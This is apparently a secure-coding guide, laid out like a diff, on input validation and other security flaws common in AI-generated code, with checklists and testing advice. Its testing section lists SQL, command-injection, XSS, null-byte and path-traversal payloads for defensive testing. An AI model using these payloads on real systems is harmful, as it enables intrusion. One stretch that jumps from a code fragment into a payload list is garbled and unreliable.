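        errors.append({"field": field, "message": message})

    email = body.get("email")
    if not isinstance(email, str) or not email:
        fail("email", "Email is required")
    elif len(email) > 254:  # length check before the regex runs
        fail("email", "Email too long")
    elif EMAIL_RE.fullmatch(email) is None:
        fail("email", "Invalid email format")

    password = body.get("password")
    if not isinstance(password, str) or not password:
        fail("password", "Password is required")
    elif len(password) < 12:
        fail("password", "Password must be 12+ characters")
    elif len(password) > 128:  # upper bound keeps hashing cost predictable
        fail("password", "Password too long")

    age = body.get("age")
    if age is None:
        fail("age", "Age is required")
    # bool is a subclass of int in Python, so exclude it explicitly.
    elif isinstance(age, bool) or not isinstance(age, int):
        fail("age", "Age must be a whole number")
    elif age < 13:
        fail("age", "Must be at least 13 years old")
    elif age > 150:
        fail("age", "Invalid age")

    return errors
```

Collecting every error before returning mirrors the pseudocode's choice to report all problems at once; a handler would call this on the parsed request body and only hash the password and create the user when the list is empty.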
+```pseudocode +// SECURE: Comprehensive server-side validation with clear error messages + +function handleRegistration(request): + errors = [] + + // Email validation + email = request.body.email + if email is null or email is empty: + errors.append({"field": "email", "message": "Email is required"}) + else if length(email) > 254: // RFC 5321 limit + errors.append({"field": "email", "message": "Email too long"}) + else if not isValidEmailFormat(email): + errors.append({"field": "email", "message": "Invalid email format"}) + else if not isAllowedEmailDomain(email): // Business rule + errors.append({"field": "email", "message": "Email domain not allowed"}) + + // Password validation + password = request.body.password + if password is null or password is empty: + errors.append({"field": "password", "message": "Password is required"}) + else if length(password) < 12: + errors.append({"field": "password", "message": "Password must be 12+ characters"}) + else if length(password) > 128: // Prevent DoS via bcrypt + errors.append({"field": "password", "message": "Password too long"}) + else if not meetsComplexityRequirements(password): + errors.append({"field": "password", "message": "Password too weak"}) + + // Age validation (integer with business range) + age = request.body.age + if age is null: + errors.append({"field": "age", "message": "Age is required"}) + else if typeof(age) != "integer": + errors.append({"field": "age", "message": "Age must be a whole number"}) + else if age < 13: // Business rule: minimum age + errors.append({"field": "age", "message": "Must be at least 13 years old"}) + else if age > 150: // Sanity check + errors.append({"field": "age", "message": "Invalid age"}) + + // Return all errors at once (better UX than one at a time) + if errors.length > 0: + return {"success": false, "errors": errors} + + // Only process after validation passes + hashedPassword = hashPassword(password) + createUser(email, hashedPassword, age) + return {"success": 
true} +``` + +**Why This Is Secure:** +- Every field validated before use +- Type, format, length, and business rules all checked +- Clear, specific error messages for debugging +- All errors collected (better user experience) +- Reasonable upper bounds prevent DoS +- Validation happens server-side where client cannot bypass + +--- + +### GOOD Example 2: Schema Validation Approaches + +```pseudocode +// SECURE: Declarative schema validation with robust library + +// Define schema once, reuse everywhere +USER_REGISTRATION_SCHEMA = { + "type": "object", + "required": ["email", "password", "age", "name"], + "additionalProperties": false, // Reject unknown fields + "properties": { + "email": { + "type": "string", + "format": "email", + "maxLength": 254 + }, + "password": { + "type": "string", + "minLength": 12, + "maxLength": 128 + }, + "age": { + "type": "integer", + "minimum": 13, + "maximum": 150 + }, + "name": { + "type": "object", + "required": ["first", "last"], + "properties": { + "first": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" // Unicode letters, spaces, hyphens, apostrophes + }, + "last": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" + } + } + } + } +} + +function handleRegistration(request): + // Validate entire payload against schema + validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA) + + if not validationResult.valid: + return { + "success": false, + "errors": validationResult.errors // Detailed error per field + } + + // Data is guaranteed to match schema structure and constraints + processRegistration(request.body) + return {"success": true} + +// Additional business logic validation after schema validation +function processRegistration(data): + // Schema ensures structure; now check business rules + if isEmailAlreadyRegistered(data.email): + throw ValidationError("Email already registered") + + if 
isCommonPassword(data.password): + throw ValidationError("Password is too common") + + createUser(data) +``` + +**Why This Is Secure:** +- Schema is declarative, easy to audit +- `additionalProperties: false` prevents unexpected data injection +- Type coercion handled consistently by library +- Unicode-aware patterns for international names +- Nested object validation built-in +- Separation of structural validation and business rules + +--- + +### GOOD Example 3: Safe Regex Patterns + +```pseudocode +// SECURE: Anchored, bounded, and ReDoS-resistant patterns + +// Email validation - anchored and bounded +// Note: Perfect email validation is complex; often better to just check format +// and verify via confirmation email +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$" + +// Safe filename - anchored, limited character set, bounded length +FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$" + +// Safe identifier (alphanumeric + underscore, starts with letter) +IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$" + +// URL path segment - no special characters +PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$" + +function validateWithSafeRegex(input, pattern, maxLength): + // Length check BEFORE regex (prevents ReDoS) + if input is null or length(input) > maxLength: + return false + + // Use timeout-protected regex matching if available + try: + return regexMatchWithTimeout(pattern, input, timeout = 100ms) + catch TimeoutException: + logWarning("Regex timeout on input: " + truncate(input, 50)) + return false + +// For complex patterns, use atomic groups or possessive quantifiers +// (syntax varies by regex engine) + +// VULNERABLE: (a+)+ +// SAFE: (?>a+)+ (atomic group - no backtracking into group) +// SAFE: a++ (possessive quantifier - never backtracks) + +// Alternative: Linear-time regex engines (RE2, rust regex) +// These reject patterns that could have exponential complexity +function validateWithLinearRegex(input, pattern): + // 
RE2 guarantees O(n) matching time + return RE2.match(pattern, input) +``` + +**Why This Is Secure:** +- All patterns anchored with `^` and `$` +- Length bounded to prevent long input attacks +- Character classes don't overlap (no `[a-zA-Z0-9]+` next to `[a-z]+`) +- No nested quantifiers that could cause backtracking +- Timeout protection as defense in depth +- Option to use linear-time regex engines + +--- + +### GOOD Example 4: Type Coercion Handling + +```pseudocode +// SECURE: Explicit type handling with safe coercion + +function parseIntegerSafe(value, min, max): + // Handle null/undefined + if value is null or value is undefined: + return {valid: false, error: "Value is required"} + + // If already integer, validate range + if typeof(value) == "integer": + if value < min or value > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + return {valid: true, value: value} + + // If string, parse carefully + if typeof(value) == "string": + // Check for valid integer string (no floats, no hex, no scientific) + if not regex.match("^-?[0-9]+$", value): + return {valid: false, error: "Invalid integer format"} + + parsed = parseInt(value, 10) // Always specify radix + + // Check for NaN (parsing failure) + if isNaN(parsed): + return {valid: false, error: "Could not parse integer"} + + // Check for overflow + if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER: + return {valid: false, error: "Integer overflow"} + + // Range check + if parsed < min or parsed > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + + return {valid: true, value: parsed} + + // Reject all other types + return {valid: false, error: "Expected integer, got " + typeof(value)} + +// Usage +function handlePayment(request): + amountResult = parseIntegerSafe(request.body.amount, 1, 1000000) // 1 cent to $10,000 + if not amountResult.valid: + return error("amount: " + amountResult.error) + + quantityResult = 
parseIntegerSafe(request.body.quantity, 1, 100) + if not quantityResult.valid: + return error("quantity: " + quantityResult.error) + + // Safe to use validated integers + total = amountResult.value * quantityResult.value + processPayment(total) +``` + +**Why This Is Secure:** +- Explicit handling of null/undefined +- Type checking before operations +- Safe string-to-integer parsing with radix +- Overflow checking for platform limits +- Range validation for business constraints +- Clear error messages for each failure mode + +--- + +### GOOD Example 5: Whitelist Validation + +```pseudocode +// SECURE: Allowlist approach - only accept known-good values + +// For enum-like fields, use explicit allowlist +ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"] +ALLOWED_ROLES = ["user", "moderator", "admin"] +ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"] +ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"] + +function validateCountry(input): + // Case-insensitive comparison against allowlist + normalized = input.toUpperCase().trim() + if normalized in ALLOWED_COUNTRIES: + return {valid: true, value: normalized} + return {valid: false, error: "Invalid country code"} + +function validateSortField(input): + // Exact match required + if input in ALLOWED_SORT_FIELDS: + return {valid: true, value: input} + return {valid: false, error: "Invalid sort field"} + +function validateFileUpload(filename, content): + // Extension whitelist + extension = getExtension(filename).toLowerCase() + if extension not in ALLOWED_FILE_EXTENSIONS: + return {valid: false, error: "File type not allowed"} + + // ALSO validate content type (magic bytes) + detectedType = detectFileType(content) + if detectedType.extension != extension: + return {valid: false, error: "File content doesn't match extension"} + + // Additional: check file isn't actually executable or contains script + if containsExecutableContent(content): + return {valid: false, error: "File contains 
disallowed content"} + + return {valid: true} + +// For SQL column/table names (cannot be parameterized) +function validateColumnName(input, allowedColumns): + if input in allowedColumns: + return input // Safe to use in query + throw ValidationError("Invalid column name") + +// Usage in query +function searchProducts(filters): + sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"]) + sortOrder = filters.order == "desc" ? "DESC" : "ASC" // Binary choice + + // Now safe to interpolate (they're from allowlist) + query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder + return database.query(query) +``` + +**Why This Is Secure:** +- Only pre-approved values accepted +- No regex complexity or bypass potential +- Clear, auditable list of allowed values +- Easy to update when requirements change +- File validation checks both extension AND content +- SQL identifiers validated against explicit list + +--- + +### GOOD Example 6: Canonicalization Before Validation + +```pseudocode +// SECURE: Normalize input before validation to prevent bypass + +function validatePath(input): + // Step 1: Reject null bytes (used to bypass filters) + if contains(input, "\x00"): + return {valid: false, error: "Invalid character in path"} + + // Step 2: Decode URL encoding (multiple rounds to catch double-encoding) + decoded = input + for i in range(3): // Max 3 rounds of decoding + newDecoded = urlDecode(decoded) + if newDecoded == decoded: + break // No more encoding to decode + decoded = newDecoded + + // Step 3: Normalize path separators + normalized = decoded.replace("\\", "/") + + // Step 4: Resolve path (remove . and ..) 
+ resolved = resolvePath(normalized) + + // Step 5: Check against allowed base directory + allowedBase = "/var/www/uploads/" + if not resolved.startsWith(allowedBase): + return {valid: false, error: "Path traversal detected"} + + // Step 6: Check for remaining dangerous patterns + if contains(resolved, ".."): + return {valid: false, error: "Invalid path component"} + + return {valid: true, value: resolved} + +function validateUsername(input): + // Normalize Unicode before validation + // NFC = Canonical Composition (combines characters) + normalized = unicodeNormalize(input, "NFC") + + // Check for confusable characters (homoglyphs) + if containsHomoglyphs(normalized): + return {valid: false, error: "Username contains confusable characters"} + + // Now validate the normalized form + if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized): + return {valid: false, error: "Invalid username format"} + + return {valid: true, value: normalized} + +function validateUrl(input): + // Parse URL to get components + parsed = parseUrl(input) + + if parsed is null: + return {valid: false, error: "Invalid URL"} + + // Validate scheme (allowlist) + if parsed.scheme not in ["http", "https"]: + return {valid: false, error: "Only HTTP(S) URLs allowed"} + + // Check for IP addresses (may be SSRF target) + if isIpAddress(parsed.host): + return {valid: false, error: "IP addresses not allowed"} + + // Check for internal hostnames + if parsed.host.endsWith(".internal") or parsed.host == "localhost": + return {valid: false, error: "Internal URLs not allowed"} + + // Check for credentials in URL + if parsed.username or parsed.password: + return {valid: false, error: "Credentials in URL not allowed"} + + // Reconstruct URL from parsed components (normalizes encoding) + canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path) + + return {valid: true, value: canonicalUrl} +``` + +**Why This Is Secure:** +- Multiple encoding layers decoded before validation +- Path 
normalization prevents traversal with `/./` or `/../` +- Unicode normalization prevents homoglyph attacks +- URL parsing validates structure before checking content +- Allowlist for URL schemes prevents `file://`, `javascript:` etc. +- SSRF protection by rejecting internal hostnames and IPs + +--- + +## Edge Cases Section + +### Edge Case 1: Unicode Normalization Issues + +```pseudocode +// DANGEROUS: Validating before normalization allows bypass + +// Attack: Using decomposed Unicode characters +// "admin" can be represented as: +// - "admin" (5 ASCII characters) +// - "admin" with combining characters: "admin" + accent marks +// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a) + +function vulnerableUsernameCheck(input): + if input == "admin": + return "Cannot register as admin" + return "OK" + +// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a') +vulnerableUsernameCheck("аdmin") // Returns "OK" +// But displays as "admin" in UI! + +// SECURE: Normalize and check for confusables +function secureUsernameCheck(input): + // Step 1: Unicode normalize to NFC + normalized = unicodeNormalize(input, "NFC") + + // Step 2: Convert confusables to ASCII equivalent + ascii = convertConfusablesToAscii(normalized) + + // Step 3: Check reserved names against ASCII version + reservedNames = ["admin", "root", "system", "administrator", "support"] + if ascii.toLowerCase() in reservedNames: + return {valid: false, error: "Reserved username"} + + // Step 4: Only allow safe character set + if not isAsciiAlphanumeric(input): + return {valid: false, error: "Username must be ASCII letters and numbers"} + + return {valid: true, value: normalized} +``` + +**Detection:** Test with Unicode confusables for admin/root, combining characters, zero-width characters. 
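The normalize-then-restrict idea from Edge Case 1 can be sketched in Python. This is a minimal sketch under stated assumptions, not this document's reference implementation: `check_username`, `RESERVED_NAMES`, and `USERNAME_RE` are hypothetical names, and the sketch swaps in NFKC normalization plus case folding and then rejects every non-ASCII character outright, instead of mapping confusables to ASCII.

```python
import re
import unicodedata

# Hypothetical reserved list, mirroring the pseudocode above.
RESERVED_NAMES = frozenset({"admin", "root", "system", "administrator", "support"})

# ASCII-only allowlist; used with fullmatch, so the whole string must match.
USERNAME_RE = re.compile(r"[a-z0-9_]{3,20}")


def check_username(raw: str) -> tuple[bool, str]:
    """Return (True, normalized_name) or (False, error_message)."""
    if not isinstance(raw, str):
        return False, "username must be a string"

    # NFKC folds compatibility forms (e.g. fullwidth letters) into their
    # plain equivalents; casefold removes case differences.
    normalized = unicodedata.normalize("NFKC", raw).casefold()

    # Anything outside the ASCII allowlist is rejected, which covers
    # Cyrillic/Greek look-alikes and zero-width characters.
    if USERNAME_RE.fullmatch(normalized) is None:
        return False, "username must be 3-20 ASCII letters, digits, or underscores"

    # Reserved-name check runs on the normalized form, never the raw input.
    if normalized in RESERVED_NAMES:
        return False, "reserved username"

    return True, normalized
```

Under these assumptions, Cyrillic `аdmin` fails the ASCII allowlist, while fullwidth `ＡＤＭＩＮ` folds to `admin` and hits the reserved list. An application that must accept non-ASCII usernames would need a real confusables mapping (for example the Unicode UTS #39 data), which this sketch does not attempt.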
+ +--- + +### Edge Case 2: Null Byte Injection + +```pseudocode +// DANGEROUS: Null bytes can truncate strings in some languages + +// Filename validation bypass with null byte +filename = "malicious.php\x00.jpg" + +// In C/PHP, strcmp might only see "malicious.php\x00" +// The ".jpg" is ignored +if filename.endsWith(".jpg"): + uploadFile(filename) // Allows .php upload! + +// Path validation bypass +path = "/safe/directory/../../etc/passwd\x00/safe/suffix" +// Validation sees: ends with "/safe/suffix" - looks OK +// File system sees: "/etc/passwd" + +// SECURE: Strip null bytes first +function sanitizeInput(input): + // Remove null bytes entirely + sanitized = input.replace("\x00", "") + + // Also remove other control characters + sanitized = removeControlCharacters(sanitized) + + return sanitized + +function validateFilename(input): + sanitized = sanitizeInput(input) + + // Now validate + if sanitized != input: + return {valid: false, error: "Invalid characters in filename"} + + // Continue with extension validation + // ... +``` + +**Detection:** Test all string inputs with embedded null bytes (`\x00`, `%00`). + +--- + +### Edge Case 3: Type Confusion + +```pseudocode +// DANGEROUS: Loose type comparison leads to bypass + +// JavaScript/PHP style loose comparison +function vulnerableAuth(password): + storedHash = "0e123456789" // Some MD5 hashes start with "0e" + inputHash = md5(password) + + // In PHP: "0e123456789" == "0e987654321" is TRUE! 
+ // Both are interpreted as 0 * 10^(number) = 0 + if inputHash == storedHash: // Loose comparison + return "Authenticated" + return "Failed" + +// Type confusion with objects/arrays +function vulnerablePasswordReset(token): + // Expected: token = "abc123def456" + // Attack: token = {"$gt": ""} (MongoDB injection via type confusion) + + if database.findOne({"resetToken": token}): + return "Token found" + +// SECURE: Strict type checking +function secureAuth(user, password): + storedHash = getStoredHash(user) + inputHash = hashPassword(password) + + // Strict comparison and constant-time + if typeof(inputHash) != "string" or typeof(storedHash) != "string": + return "Failed" + + if not constantTimeEquals(inputHash, storedHash): + return "Failed" + + return "Authenticated" + +function securePasswordReset(token): + // Enforce string type + if typeof(token) != "string": + return {valid: false, error: "Invalid token format"} + + // Validate format + if not regex.match("^[a-f0-9]{64}$", token): + return {valid: false, error: "Invalid token format"} + + // Now safe to query + result = database.findOne({"resetToken": token}) + // ... +``` + +**Detection:** Test with different types: arrays, objects, numbers, booleans where strings are expected. + +--- + +### Edge Case 4: Integer Overflow in Validation + +```pseudocode +// DANGEROUS: Validation passes but computation overflows + +function vulnerablePurchase(quantity, price): + // Validate ranges + if quantity < 0 or quantity > 1000000: + return error("Invalid quantity") + if price < 0 or price > 1000000: + return error("Invalid price") + + // Both pass validation, but multiplication overflows! 
+ // quantity = 999999, price = 999999 + // total = 999998000001 (exceeds 32-bit integer) + total = quantity * price // OVERFLOW + + chargeCustomer(total) // May wrap to negative or small number + +// SECURE: Check for overflow in computation +function securePurchase(quantity, price): + // Validate individual ranges + if not isValidInteger(quantity, 1, 1000): + return error("Invalid quantity") + if not isValidInteger(price, 1, 10000000): // in cents + return error("Invalid price") + + // Check multiplication won't overflow + MAX_SAFE_TOTAL = 2147483647 // 32-bit signed max + + if quantity > MAX_SAFE_TOTAL / price: + return error("Order total too large") + + total = quantity * price // Now safe + + // Additional business validation + if total > MAX_ALLOWED_TRANSACTION: + return error("Transaction exceeds limit") + + chargeCustomer(total) + +// Alternative: Use arbitrary precision arithmetic for money +function securePurchaseWithDecimal(quantity, price): + quantityDecimal = Decimal(quantity) + priceDecimal = Decimal(price) + + total = quantityDecimal * priceDecimal // No overflow + + if total > Decimal(MAX_ALLOWED_TRANSACTION): + return error("Transaction exceeds limit") + + chargeCustomer(total) +``` + +**Detection:** Test with MAX_INT, MAX_INT-1, boundary values, and combinations that multiply to overflow. + +--- + +## Common Mistakes Section + +### Common Mistake 1: Validating Formatted Output Instead of Input + +```pseudocode +// WRONG: Validate after formatting +function displayUserData(userId): + userData = database.getUser(userId) // Raw from DB + + // Format for display + formattedName = formatName(userData.name) + formattedBio = formatBio(userData.bio) + + // Validating AFTER format - too late! 
+ if containsHtml(formattedName): // Already formatted/escaped + return error("Invalid name") + + return template.render(formattedName, formattedBio) + +// CORRECT: Validate at input, encode at output +function saveUserData(request): + name = request.body.name + bio = request.body.bio + + // Validate raw input BEFORE storing + if not isValidName(name): + return error("Invalid name") + + if containsDangerousPatterns(bio): + return error("Invalid bio content") + + // Store validated (but not encoded) data + database.saveUser({"name": name, "bio": bio}) + +function displayUserData(userId): + userData = database.getUser(userId) + + // Encode for output context (don't validate again) + return template.render({ + "name": htmlEncode(userData.name), + "bio": htmlEncode(userData.bio) + }) +``` + +**Why This Is Wrong:** +- Validation should happen at input boundary, not output +- Formatted/encoded data may pass validation but still be dangerous +- Encoding should happen at output, specific to context +- Validation after formatting is security theater + +--- + +### Common Mistake 2: Using String Operations on Binary Data + +```pseudocode +// WRONG: String operations on binary data +function processUploadedImage(fileContent): + // Convert binary to string - CORRUPTS DATA + contentString = fileContent.toString("utf-8") + + // String operations fail on binary + if contentString.startsWith("\x89PNG"): // May not work correctly + processImage(contentString) // Corrupted! + + // Regex on binary data is meaningless + if regex.match(", javascript:alert(1) + +// 5. 
ReDoS testing +- For each regex, test with pattern: (valid_char * 30) + invalid_char +- Measure response time - should be < 100ms +- Exponential time indicates ReDoS vulnerability +``` + +--- + +## Security Checklist + +- [ ] All user input validated on the server side (never trust client-side only) +- [ ] Schema validation enforces expected structure (`additionalProperties: false`) +- [ ] All required fields checked for null/undefined/empty +- [ ] String lengths validated with reasonable maximums (prevents DoS) +- [ ] Numeric values validated for type, range, and overflow potential +- [ ] Arrays validated for max length and item constraints +- [ ] Enum fields validated against explicit allowlist +- [ ] All regex patterns anchored with `^` and `$` +- [ ] Regex patterns tested for ReDoS vulnerability +- [ ] Length checked BEFORE regex matching (ReDoS mitigation) +- [ ] Timeout protection on regex operations (defense in depth) +- [ ] Unicode input normalized before validation (NFC/NFKC) +- [ ] Null bytes (`\x00`, `%00`) rejected in string input +- [ ] Path inputs canonicalized and validated against allowed directories +- [ ] URL inputs parsed and validated (scheme, host, no credentials) +- [ ] File uploads validated by both extension AND content type +- [ ] Integer arithmetic checked for overflow before computation +- [ ] Type coercion explicit with proper error handling +- [ ] Validation consistent across all endpoints (centralized validators) +- [ ] Error messages helpful but don't leak validation logic details +- [ ] Validation rules documented and version controlled +- [ ] Validation tested with fuzzing and boundary values + +--- + +# Executive Summary + +## The 6 Critical Security Anti-Patterns + +This document provides comprehensive coverage of the **6 most critical and commonly occurring security vulnerabilities** in AI-generated code. Together, these patterns represent the root causes of the vast majority of security incidents in AI-assisted development. 
+ +### Pattern Overview + +| # | Pattern | Risk Level | AI Frequency | Key Threat | +|---|---------|------------|--------------|------------| +| 1 | **Hardcoded Secrets** | Critical | Very High | Credential theft, API abuse, data breaches | +| 2 | **SQL/Command Injection** | Critical | High | Database compromise, RCE, system takeover | +| 3 | **Cross-Site Scripting (XSS)** | High | Very High | Session hijacking, account takeover, defacement | +| 4 | **Authentication/Session** | Critical | High | Complete authentication bypass, privilege escalation | +| 5 | **Cryptographic Failures** | High | Very High | Data decryption, credential exposure, forgery | +| 6 | **Input Validation** | High | Very High | Enables all other injection attacks | + +### Why These 6 Patterns Matter + +**They are interconnected:** Input validation failures enable injection attacks. Cryptographic failures expose the secrets that hardcoded credentials would have protected. Authentication weaknesses make XSS more devastating. + +**AI models struggle with all of them:** Training data contains countless examples of insecure patterns. AI models optimize for "working code" rather than "secure code." The patterns that make code secure are often invisible (environment variables, parameterized queries, proper encoding) while insecure patterns are explicit and visible. + +**They have compounding effects:** A single hardcoded secret can expose thousands of users. A single SQL injection can dump an entire database. A single XSS vulnerability can persist across sessions and users. + +--- + +# Critical Checklists: One-Line Reminders + +These condensed checklists provide quick reference for each pattern. Use during code review or before committing changes. 
+ +## Pattern 1: Hardcoded Secrets + +| ✓ | Checkpoint | +|---|------------| +| □ | No API keys, passwords, or tokens in source files | +| □ | All secrets loaded from environment variables or secret managers | +| □ | `.env` files in `.gitignore` with `.env.example` for templates | +| □ | No secrets in logs, error messages, or URLs | +| □ | Secret scanning enabled in CI/CD pipeline | +| □ | Credentials rotated regularly and rotation is automated | + +## Pattern 2: SQL/Command Injection + +| ✓ | Checkpoint | +|---|------------| +| □ | All SQL queries use parameterized statements (no string concatenation) | +| □ | Dynamic identifiers (table/column names) validated against allowlist | +| □ | ORM queries reviewed for raw query vulnerabilities | +| □ | Shell commands avoid user input; if required, use allowlist validation | +| □ | Second-order injection checked (stored data used in queries) | +| □ | Prepared statements used for ALL statement types (SELECT, INSERT, UPDATE, DELETE); ORDER BY columns go through the identifier allowlist | + +## Pattern 3: Cross-Site Scripting (XSS) + +| ✓ | Checkpoint | +|---|------------| +| □ | HTML encoding for HTML body context | +| □ | Attribute encoding for HTML attributes (especially event handlers) | +| □ | JavaScript encoding for inline scripts | +| □ | URL encoding for URL contexts | +| □ | CSP headers configured with strict policy (no `unsafe-inline`) | +| □ | `innerHTML` avoided; use `textContent` or framework safe bindings | +| □ | Sanitization libraries tested against mutation XSS | + +## Pattern 4: Authentication/Session Security + +| ✓ | Checkpoint | +|---|------------| +| □ | Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) | +| □ | Session tokens cryptographically random (256+ bits entropy) | +| □ | JWT algorithm explicitly validated (`alg: none` rejected) | +| □ | Tokens stored in HttpOnly, Secure, SameSite cookies | +| □ | Session invalidated on logout (server-side) | +| □ | Constant-time comparison for password/token verification | +| □ | Rate limiting on authentication endpoints | 
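Three of the Pattern 4 checkpoints (random session tokens, hardened cookies, constant-time comparison) can be sketched with the Python standard library alone. This is an illustrative sketch, not a prescribed implementation: the function names and the cookie name `session` are assumptions introduced here, and a real application would normally let its web framework set the cookie.

```python
import hmac
import secrets
from http.cookies import SimpleCookie


def new_session_token() -> str:
    # 32 bytes from the OS CSPRNG = 256 bits, encoded as URL-safe text.
    return secrets.token_urlsafe(32)


def build_session_cookie(token: str) -> str:
    # Hypothetical cookie name "session"; the flags mirror the checklist row
    # "Tokens stored in HttpOnly, Secure, SameSite cookies".
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    return cookie["session"].OutputString()


def tokens_match(presented: str, expected: str) -> bool:
    # hmac.compare_digest does not short-circuit on the first differing byte,
    # so timing does not reveal how much of the token was correct.
    return hmac.compare_digest(presented.encode("utf-8"), expected.encode("utf-8"))
```

The value returned by `build_session_cookie` is meant to be sent in a `Set-Cookie` response header. Server-side invalidation on logout and rate limiting are not covered by this sketch.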
+ +## Pattern 5: Cryptographic Failures + +| ✓ | Checkpoint | +|---|------------| +| □ | AES-256-GCM or ChaCha20-Poly1305 for symmetric encryption | +| □ | Fresh random IV/nonce for every encryption operation | +| □ | CSPRNG used for all security-sensitive random values | +| □ | bcrypt/Argon2id for password hashing (not PBKDF2 for passwords) | +| □ | Key derivation uses HKDF or PBKDF2 with appropriate iterations | +| □ | No ECB mode, no static IVs, no Math.random() | +| □ | Constant-time comparison for MAC/signature verification | + +## Pattern 6: Input Validation + +| ✓ | Checkpoint | +|---|------------| +| □ | All validation performed on server side | +| □ | Schema validation with `additionalProperties: false` | +| □ | All regex patterns anchored with `^` and `$` | +| □ | Length limits checked BEFORE regex matching | +| □ | Null bytes rejected in string input | +| □ | Unicode normalized before validation | +| □ | Type coercion explicit with error handling | + +--- + +# Testing Recommendations by Vulnerability Type + +## Hardcoded Secrets Testing + +```pseudocode +// Automated Secret Detection +1. Pre-commit hooks with secret scanners: + - TruffleHog + - detect-secrets + - gitleaks + - git-secrets + +2. CI/CD Pipeline Scanning: + - Run on every PR/MR + - Scan full git history on merge to main + - Block deployment on secret detection + +3. Runtime Detection: + - Log analysis for credential patterns + - API request auditing for hardcoded keys + - Cloud provider secret exposure alerts + +// Testing Checklist +- [ ] Scan all source files for API key patterns +- [ ] Scan all config files for password strings +- [ ] Check git history for past secret commits +- [ ] Verify environment variables are properly loaded +- [ ] Test application behavior when secrets are missing +- [ ] Verify secrets are not exposed in error messages +``` + +## SQL/Command Injection Testing + +```pseudocode +// Automated Testing Tools +1. 
SAST (Static Analysis): + - Semgrep with injection rules + - CodeQL injection queries + - SonarQube SQL injection checks + +2. DAST (Dynamic Analysis): + - SQLMap for SQL injection + - Burp Suite active scanning + - OWASP ZAP automated scan + +3. Manual Testing Payloads: + // SQL Injection + - Single quote: ' + - Comment: -- or # + - Boolean: ' OR '1'='1 + - Time-based: '; WAITFOR DELAY '0:0:10'-- + - Union: ' UNION SELECT null,null-- + + // Command Injection + - Semicolon: ;whoami + - Pipe: |id + - Backticks: `whoami` + - Command substitution: $(whoami) + - Newline: %0a id + +// Testing Checklist +- [ ] Test all user input fields with injection payloads +- [ ] Test ORDER BY, LIMIT, table name parameters +- [ ] Test stored data for second-order injection +- [ ] Test file paths for command injection +- [ ] Verify all queries use parameterization +- [ ] Check logs don't reveal injection success/failure +``` + +## XSS Testing + +```pseudocode +// Automated Testing +1. Browser Tools: + - DOM Invader (Burp) + - XSS Hunter + - DOMPurify testing mode + +2. Automated Scanners: + - Burp Suite XSS scanner + - OWASP ZAP active scan + - Nuclei XSS templates + +3. Manual Testing Payloads: + // HTML Context + - + - + - + + // Attribute Context + - " onmouseover="alert(1) + - ' onfocus='alert(1)' autofocus=' + + // JavaScript Context + - '-alert(1)-' + - ';alert(1)// + - \u003cscript\u003e + + // URL Context + - javascript:alert(1) + - data:text/html, + +// Testing Checklist +- [ ] Test all output points with context-specific payloads +- [ ] Test encoding bypass techniques +- [ ] Test DOM XSS with source/sink analysis +- [ ] Verify CSP headers block inline scripts +- [ ] Test mutation XSS with sanitizer bypass payloads +- [ ] Check for polyglot XSS across contexts +``` + +## Authentication/Session Testing + +```pseudocode +// Testing Tools +1. Session Analysis: + - Burp Suite session handling + - OWASP ZAP session management + - Custom scripts for token analysis + +2. 
JWT Testing: + - jwt.io debugger + - jwt_tool + - jose library testing + +3. Manual Testing: + // Session Token Analysis + - Check entropy (should be 256+ bits) + - Test token predictability + - Test session fixation + + // JWT Attacks + - Algorithm confusion (RS256 → HS256) + - None algorithm bypass + - Key injection attacks + - Signature stripping + + // Authentication Bypass + - SQL injection in login + - Password reset token prediction + - OAuth state parameter manipulation + +// Testing Checklist +- [ ] Test session token randomness +- [ ] Verify session invalidation on logout +- [ ] Test for session fixation +- [ ] Verify JWT algorithm validation +- [ ] Test rate limiting on login +- [ ] Check for timing attacks on password comparison +- [ ] Test password reset flow for token issues +``` + +## Cryptographic Implementation Testing + +```pseudocode +// Crypto Testing Tools +1. Static Analysis: + - Semgrep crypto rules + - CryptoGuard + - Crypto-detector + +2. Manual Review: + // Check for weak algorithms: + grep -r "MD5\|SHA1\|DES\|RC4\|ECB" . + + // Check for static IVs: + grep -r "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" . + + // Check for weak randomness: + grep -r "Math\.random\|random\.random\|rand\(\)" . + +3. Runtime Testing: + - Encrypt same plaintext twice, verify different ciphertext + - Test key derivation iterations (should take 100ms+) + - Verify timing consistency in comparisons + +// Testing Checklist +- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage +- [ ] Confirm unique IV/nonce per encryption +- [ ] Test password hashing takes appropriate time (100ms+) +- [ ] Verify CSPRNG used for all secrets +- [ ] Check key derivation iteration counts +- [ ] Test for padding oracle vulnerabilities +- [ ] Verify constant-time comparison functions +``` + +## Input Validation Testing + +```pseudocode +// Testing Approach +1. 
